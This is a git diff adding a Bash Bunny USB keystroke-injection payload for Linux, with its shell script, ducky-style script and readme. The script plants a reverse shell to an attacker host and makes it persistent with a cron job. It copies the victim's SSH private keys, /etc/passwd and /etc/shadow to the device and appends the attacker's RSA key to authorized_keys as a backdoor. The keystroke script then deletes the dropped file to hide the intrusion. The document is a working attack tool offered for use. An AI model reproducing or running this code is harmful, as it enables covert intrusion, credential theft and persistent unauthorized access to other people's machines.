diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh new file mode 100644 index 00000000..82643fc0 --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/boom.sh @@ -0,0 +1,48 @@ +#!/bin/bash + +# Main Payload + +# Set variables for METERPRETER Reverse_TCP Session, CRON schedule, Attacker's RSA Key, etc.. +RSA_KEY='PLACEHOLDER-FOR-RSA-PUBLIC-KEY' # replace with the contents of ~/.ssh/id_rsa.pub or whatever your RSA public key file is named +REVERSESHELL=true +LHOST='10.20.20.104' # Reverse Shell listening host IP +LPORT='4444' # Reverse Shell listening host port +CRON='30 */1 * * *' # Just the timing portion of the CRON job +ATTACKER_HOST='engineering@kali-2' # Tail end of RSA key from above. Do not include spaces +DT=$(date "+%Y.%m.%d-%H.%M.%S") +DN=/media/$USER/BashBunny/loot/$USER-$HOSTNAME-$DT + +if [ "$REVERSESHELL" = true ] ; then + # Create reverse shell script + echo "#!/bin/bash"> .config/rs.sh ; + echo "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1">> .config/rs.sh ; + chmod +x /home/$USER/.config/rs.sh ; + + # Add task to CRON that launches the Reverse_TCP script on a schedule for persistence + crontab -l > crontab.tmp ; + if grep -Fq .config/rs.sh crontab.tmp; then + echo 'Update in progress.' + else + echo "$CRON /home/$USER/.config/rs.sh" >> crontab.tmp ; + crontab crontab.tmp ; + fi + rm -f crontab.tmp ; +fi + +# Smash & Grab the loot!! (Get what you can now and work on PrivEsc later) +mkdir $DN ; +ip addr > $DN/ip-addr.txt ; +whoami > $DN/whoami.txt ; +cat /proc/net/arp > $DN/arp.txt ; +cat /etc/passwd > $DN/etc-passwd.txt ; +cat /etc/shadow > $DN/etc-shadow.txt ; +uname -a > $DN/uname-a.txt ; +route -n > $DN/route-n.txt ; +cp /home/$USER/.ssh/* $DN/. ; + +# Add Attacker's RSA key to .ssh/authorized_keys for additional persistence +if grep -Fq $ATTACKER_HOST .ssh/authorized_keys ; then + echo 'Update almost completed.' +else + echo $RSA_KEY >> .ssh/authorized_keys ; +fi diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt new file mode 100644 index 00000000..1033e110 --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/payload.txt @@ -0,0 +1,54 @@ +# Title: SSHhhhhh +# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors +# Author: WWVB +# Props: Hak5Darren, hak5peaks +# Version: 1.1 +# Category: Exfiltration w/Persistence +# Target: Linux Ubuntu 18.04 LTS +# Attackmodes: HID, Storage + +DRIVE_LABEL="BashBunny" + +#!/bin/bash + +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +LED STAGE1 +QUACK DELAY 500 +QUACK CTRL-ALT t +QUACK DELAY 100 + +# Drop primary payload on the box +QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh . +QUACK ENTER +QUACK DELAY 50 + +QUACK STRING chmod +x boom.sh +QUACK ENTER +QUACK DELAY 50 + +LED ATTACK + +# Light the fuse and wait!! +QUACK STRING ./boom.sh +QUACK ENTER +QUACK DELAY 1000 + +# Cleanup +LED CLEANUP +QUACK STRING rm boom.sh +QUACK ENTER +QUACK DELAY 100 + +# Bye Felicia! +QUACK STRING umount '/media/$USER/$DRIVE_LABEL' +QUACK ENTER +QUACK DELAY 25 + +QUACK STRING exit +QUACK ENTER +QUACK DELAY 25 + +LED FINISH diff --git a/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md b/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md new file mode 100644 index 00000000..8f1064aa --- /dev/null +++ b/payloads/library/remote_access/SSHhhhhh-(Linux)/readme.md @@ -0,0 +1,32 @@ +# SSHhhhhh + +## Author: WWVB +## Version: Version 1.0 + +## Description + +## Target = Unlocked Linux machine (only tested on Ubuntu 18.04 LTS) +Base install of OS, plus OPENSSH-SERVER & NET-TOOLS (if NET-TOOLS is not installed, the route command will not return data [nothing major]) + +## Loot = Contents of ~/$USER/.ssh folder (pub/priv RSA keys, known_hosts, etc..) + whoami + + ip addr + + arp data + + route -n + + /etc/passwd + + /etc/shadow (on the off chance you get a root terminal) + + uname -a + +## Two opportunites for persistence are injected: + + Attacker's RSA key is added to ~/$USER/.ssh/authorized_keys (aka I'll Call You) + + Reverse_TCP shell script is dropped in the ~/$USER/.config folder and a CRON job added that calls it on a schedule (aka Call Me Later) + +## Configuration = HID STORAGE